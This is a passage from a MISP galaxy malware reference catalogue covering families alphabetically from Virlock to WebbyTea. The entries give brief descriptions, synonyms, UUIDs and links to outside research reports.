- https://blogs.blackberry.com/en/2019/07/threat-spotlight-virlock-polymorphic-ransomware - webarchive
- https://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VIRTUALGATE
Internal MISP references
UUID 48d47a27-464a-4087-b691-574c3b494efb
which can be used as unique global reference for VIRTUALGATE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Virut
Internal MISP references
UUID 2e99f27c-6791-4695-b88b-de4d4cbda8d6
which can be used as unique global reference for Virut
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.virut - webarchive
- https://www.secureworks.com/research/virut-encryption-analysis - webarchive
- https://chrisdietri.ch/post/virut-resurrects/ - webarchive
- https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/ - webarchive
- https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/ - webarchive
- https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/ - webarchive
- https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet - webarchive
- https://www.mandiant.com/resources/pe-file-infecting-malware-ot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vizom
Internal MISP references
UUID a49d6db9-32a0-42a8-acb9-174146a7fafa
which can be used as unique global reference for Vizom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vjw0rm
VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).
Internal MISP references
UUID 3a8186f1-ff2a-4431-be99-7e31c0096f15
which can be used as unique global reference for Vjw0rm
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf - webarchive
- https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf - webarchive
- https://resources.securityscorecard.com/research/acasestudyofVjw0rm#page=1 - webarchive
- https://twitter.com/tccontre18/status/1461386178528264204 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics - webarchive
- https://community.riskiq.com/article/24759ad2 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://bazaar.abuse.ch/browse/signature/Vjw0rm/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VM Zeus
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VM Zeus.
Known Synonyms |
---|
VMzeus |
Zberp |
ZeusVM |
Internal MISP references
UUID c32740a4-db2c-4d71-80bd-7377185f4a6f
which can be used as unique global reference for VM Zeus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vobfus
Malware of this family searches for computers on a network and creates copies of itself in folders with open access. For the program to be activated, the user must first run it on the computer. The code of this malware is written in the Visual Basic programming language and uses obfuscation, which is a distinguishing feature of this family. Code obfuscation complicates attempts by anti-virus software to analyze suspected malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vobfus.
Known Synonyms |
---|
Beebone |
Internal MISP references
UUID 60f7b1b9-c283-4395-909f-7b8b1731e840
which can be used as unique global reference for Vobfus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus - webarchive
- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/ - webarchive
- http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vohuk
Internal MISP references
UUID f2c91bfb-1b22-4399-849a-f07304c2e81f
which can be used as unique global reference for Vohuk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Void
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Void.
Known Synonyms |
---|
VoidCrypt |
Internal MISP references
UUID 55f66b60-5284-4db6-b26e-52b3aea17641
which can be used as unique global reference for Void
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Voidoor
Internal MISP references
UUID e9525c0d-0fba-4a0c-8b9d-31acc21194db
which can be used as unique global reference for Voidoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VoidRAT
Internal MISP references
UUID d78756c3-912a-438e-b9d2-d41ae95f42c3
which can be used as unique global reference for VoidRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Voldemort
Voldemort is a backdoor discovered by Proofpoint in August 2024. It is distributed via phishing e-mails and makes use of creative techniques such as using saved search files during the infection chain for obfuscation and Google Sheets for C2. While its broad targeting looks like it is related to ecrime, Proofpoint notes that the capabilities of the malware point towards espionage/APT activity.
Internal MISP references
UUID c87d3310-07fd-4e3a-88ca-9ccb0a339876
which can be used as unique global reference for Voldemort
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Volgmer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Volgmer.
Known Synonyms |
---|
FALLCHILL |
Manuscrypt |
Internal MISP references
UUID bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f
which can be used as unique global reference for Volgmer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer - webarchive
- https://asec.ahnlab.com/en/56405/ - webarchive
- https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74 - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://securelist.com/operation-applejeus/87553/ - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-academy - webarchive
- https://asec.ahnlab.com/en/57685/ - webarchive
- https://asec.ahnlab.com/ko/56256/ - webarchive
- https://securelist.com/lazarus-threatneedle/100803/ - webarchive
- https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf - webarchive
- https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-318B - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vovalex
Ransomware written in D.
Internal MISP references
UUID fe4ffa8d-74d2-472a-b0ca-83f9e7f95739
which can be used as unique global reference for Vovalex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vreikstadi
Internal MISP references
UUID ab2a63f1-1afd-44e7-9cf4-c775dbee78f4
which can be used as unique global reference for Vreikstadi
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vshell
Vshell is an OST framework written in Go that provides implants for multiple platforms (Windows, Linux, macOS).
Internal MISP references
UUID b7055f10-84a9-4380-ae76-6094c23ef8b7
which can be used as unique global reference for Vshell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VSingle
Internal MISP references
UUID a9afe6ba-732a-45fe-a925-2b61b05e5a76
which can be used as unique global reference for VSingle
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle - webarchive
- https://blogs.jpcert.or.jp/en/2022/07/vsingle.html - webarchive
- https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html - webarchive
- https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://www.youtube.com/watch?v=nUjxH1gW53s - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
vSkimmer
Internal MISP references
UUID 3eae1764-7ea6-43e6-85a1-b1dd0b4856b8
which can be used as unique global reference for vSkimmer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer - webarchive
- http://www.xylibox.com/2013/01/vskimmer.html - webarchive
- http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis - webarchive
- https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vulturi
Information stealer.
Internal MISP references
UUID cfbd52a9-39d6-46f4-a539-76abcec92088
which can be used as unique global reference for Vulturi
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vyveva RAT
Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.
It uses a simple XOR for encryption of its configuration and network traffic.
It sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.
It supports more than 20 commands that include operations on the victim's filesystem, basic process management, command line execution, file exfiltration, and the download and in-memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from the Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. It can also monitor newly connected drives and the number of logged-on users.
It has MPRD.dll as the internal DLL name, and a single export SamIInitialize.
Vyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.
Internal MISP references
UUID b7f0ba08-8e7c-43cd-9b26-8dfef763a404
which can be used as unique global reference for Vyveva RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
w32times
Internal MISP references
UUID 2479b6b9-c818-4f96-aba4-47ed7855e4a8
which can be used as unique global reference for w32times
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.wabot
Wabot is an IRC worm that is written in Delphi.
Internal MISP references
UUID cce35d3d-aea0-4e59-92cf-3289be4a4c21
which can be used as unique global reference for win.wabot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
wAgentTea
wAgentTea is an HTTP(S) downloader.
It was deployed mostly against South Korean targets such as a pharmaceutical company (Q4 2020) or the semiconductor industry (Q2 2023). In several cases, initial access was obtained via exploitation of South Korean software such as Initech's INISAFE CrossWeb EX or Dream Security's MagicLine4NX.
It uses AES-128 for encryption and decryption of its network traffic, and for decryption of its binary configuration.
There is a hard-coded list of parameter names used in its HTTP POST request: identy;tname;blogdata;content;thesis;method;bbs;level;maincode;tab;idx;tb;isbn;entry;doc;category;articles;portal
It contains a specific RTTI symbol ".?AVCHttp_socket@@".
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular wAgentTea.
Known Synonyms |
---|
wAgent |
Internal MISP references
UUID 03bf5a8b-774c-498a-9fa2-b4027695fd00
which can be used as unique global reference for wAgentTea
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wagenttea - webarchive
- https://asec.ahnlab.com/en/33801/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ - webarchive
- https://asec.ahnlab.com/wp-content/uploads/2023/10/20231013_Lazarus_OP.Dream_Magic.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WallyShack
Internal MISP references
UUID 0bd92907-c858-4164-87d6-fec0f3595e69
which can be used as unique global reference for WallyShack
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WannaCryptor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WannaCryptor.
Known Synonyms |
---|
Wana Decrypt0r |
WannaCry |
WannaCrypt |
Wcry |
Internal MISP references
UUID ad67ff31-2a02-43f9-8b12-7df7e4fcccd6
which can be used as unique global reference for WannaCryptor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor - webarchive
- https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1 - webarchive
- https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984 - webarchive
- https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1 - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58 - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/ - webarchive
- https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html - webarchive
- https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf - webarchive
- http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html - webarchive
- https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/ - webarchive
- https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e - webarchive
- https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf - webarchive
- https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group - webarchive
- https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html - webarchive
- https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/ - webarchive
- https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168 - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf - webarchive
- https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/ - webarchive
- https://securelist.com/big-threats-using-code-similarity-part-1/97239/ - webarchive
- https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/ - webarchive
- https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/ - webarchive
- https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/ - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf - webarchive
- https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf - webarchive
- https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today - webarchive
- https://www.youtube.com/watch?v=Q90uZS3taG0 - webarchive
- https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf - webarchive
- http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WannaHusky
According to Mars, WannaHusky is a Nim-compiled ransomware sample created for demonstration purposes and provided as part of the Practical Malware Analysis & Triage course offered by HuskyHacks.
Internal MISP references
UUID 10fc30fe-9f64-4765-a341-acde878f105c
which can be used as unique global reference for WannaHusky
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WannaRen
Ransomware.
Internal MISP references
UUID 44f548e2-9a47-433a-bccf-fff412d2963b
which can be used as unique global reference for WannaRen
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Warezov
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Warezov.
Known Synonyms |
---|
Opnis |
Stration |
Internal MISP references
UUID 925a5c68-5c9c-45ae-a3a5-8ba5ba692ada
which can be used as unique global reference for Warezov
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WarHawk
Internal MISP references
UUID 92e52625-f8eb-422e-b277-0bc994c19bb4
which can be used as unique global reference for WarHawk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WarmCookie
WarmCookie is a backdoor capable of executing commands, reading and writing files, and capturing screenshots. It communicates with a command and control (C&C) server via HTTP to receive further instructions and exfiltrate stolen data. It is commonly distributed through phishing campaigns and malicious downloads, targeting unsuspecting users to infiltrate systems undetected.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WarmCookie.
Known Synonyms |
---|
Badspace |
KongTuke |
QUICKBIND |
Internal MISP references
UUID 2088185c-4ac4-4956-968e-103edc955f4e
which can be used as unique global reference for WarmCookie
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.warmcookie - webarchive
- https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor - webarchive
- https://www.elastic.co/security-labs/dipping-into-danger - webarchive
- https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_WarmCookie.yar - webarchive
- https://github.com/X-Junior/Malware-String-Decryptor-Scripts/blob/main/Badspace/badspace.py - webarchive
- https://community.emergingthreats.net/t/sigs-w32-badspace-backdoor/1630 - webarchive
- https://hunt.io/blog/from-warm-to-burned-shedding-light-on-updated-warmcookie-infrastructure - webarchive
- https://darktrace.com/blog/disarming-the-warmcookie-backdoor-darktraces-oven-ready-solution - webarchive
- https://github.com/dstepanic/slides/blob/main/VBCONF_2024/VB2024%20-%20Getting%20Cozy%20with%20Milk%20and%20WARMCOOKIES.pdf - webarchive
- https://blog.talosintelligence.com/warmcookie-analysis/ - webarchive
- https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/ - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign - webarchive
- https://x.com/GenThreatLabs/status/1840762181668741130 - webarchive
- https://securityintelligence.com/x-force/hive0137-on-ai-journey/ - webarchive
- https://github.com/X-Junior/Malware-IDAPython-Scripts/blob/main/Badspace/badspace.py - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WastedLoader
This malware looks similar to WastedLocker, but the ransomware component is missing.
Internal MISP references
UUID c6b601f6-4cb6-4e7b-98fd-35af910ec0d8
which can be used as unique global reference for WastedLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WastedLocker
WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates, which includes an abbreviation of the victim's name and the string 'wasted'. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was also used by other malware families such as Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase the entropy of the sample and hide the actual code.
Internal MISP references
UUID e72a0bde-ea5b-4450-bc90-b5d2dca697b4
which can be used as unique global reference for WastedLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker - webarchive
- https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/ - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/ - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://ioc.hatenablog.com/entry/2020/08/16/132853 - webarchive
- https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/ - webarchive
- https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/ - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp - webarchive
- https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd - webarchive
- https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html - webarchive
- https://unit42.paloaltonetworks.com/wastedlocker/ - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf - webarchive
- https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf - webarchive
- https://securelist.com/wastedlocker-technical-analysis/97944/ - webarchive
- https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/ - webarchive
- https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/ - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/ - webarchive
- https://seguranca-informatica.pt/wastedlocker-malware-analysis/#.YfAaIRUITTY.twitter - webarchive
- https://www.bbc.com/news/world-us-canada-53195749 - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us - webarchive
- https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/ - webarchive
- https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77 - webarchive
- https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Waterbear
Waterbear, also known as DbgPrint after the export function of its earlier versions, has been active since 2009. The malware is presumably developed by the BlackTech APT group and adopts advanced anti-analysis and forward-thinking design. These designs include a sophisticated shellcode stager, the ability to load plugins on the fly, and overall evasiveness should the C2 server fail to respond with a valid session key.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Waterbear.
Known Synonyms |
---|
DbgPrint |
EYEWELL |
Internal MISP references
UUID 042ddeed-78e4-4799-965a-3b6815145f28
which can be used as unique global reference for Waterbear
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf - webarchive
- https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/ - webarchive
- https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html - webarchive
- https://www.youtube.com/watch?v=6SDdUVejR2w - webarchive
- https://daydaynews.cc/zh-tw/technology/297265.html - webarchive
- https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/ - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WaterMiner
Internal MISP references
UUID d536931e-ad4f-485a-b93d-fe05f23a9367
which can be used as unique global reference for WaterMiner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WaterSpout
Internal MISP references
UUID d238262a-4832-408f-9926-a7174e671b50
which can be used as unique global reference for WaterSpout
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Wave Stealer
Wave Stealer is an infostealer offered as Malware-as-a-Service by a French-speaking actor called "Wave". The threat actor has strong relationships with the Nova Stealer and Epsilon Stealer groups. Its capabilities include password and crypto-wallet stealing, Discord and Telegram injection, and a backup-code finder.
Internal MISP references
UUID 211b7cfe-51e8-4dfe-af12-5f350e49af86
which can be used as unique global reference for Wave Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WavyExfiller
Internal MISP references
UUID 6df6bf6d-8069-4923-914f-b56b2a111972
which can be used as unique global reference for WavyExfiller
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WebbyTea
WebbyTea is an HTTP(S) downloader that uses AES for C&C traffic encryption.
It sends detailed information about the victim's environment, like proxy settings, system installation date, Windows product name and version, manufacturer, product name, system boot time, time zone, computer name, user name, current time and a list of currently running processes. Data sent to the C&C server consists of the prefix "ci", a 16-character hexadecimal string representing the victim ID and encrypted data about the victim's system. After the payload is acquired from the server and successfully injected into a newly created explorer.exe process, the malware responds with the same victim ID, with the prefix changed to "cs".
The internal DLL name of the native WebbyTea is usually pe64.dll or webT64.dll (from which its name is derived).
The usual payload associated with WebbyTea is SnatchCrypto.
Internal MISP references
UUID e8056d43-7dd7-49ae-8cd7-07be367fb6b4
which can be used as unique global reference for WebbyTea
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea - webarchive
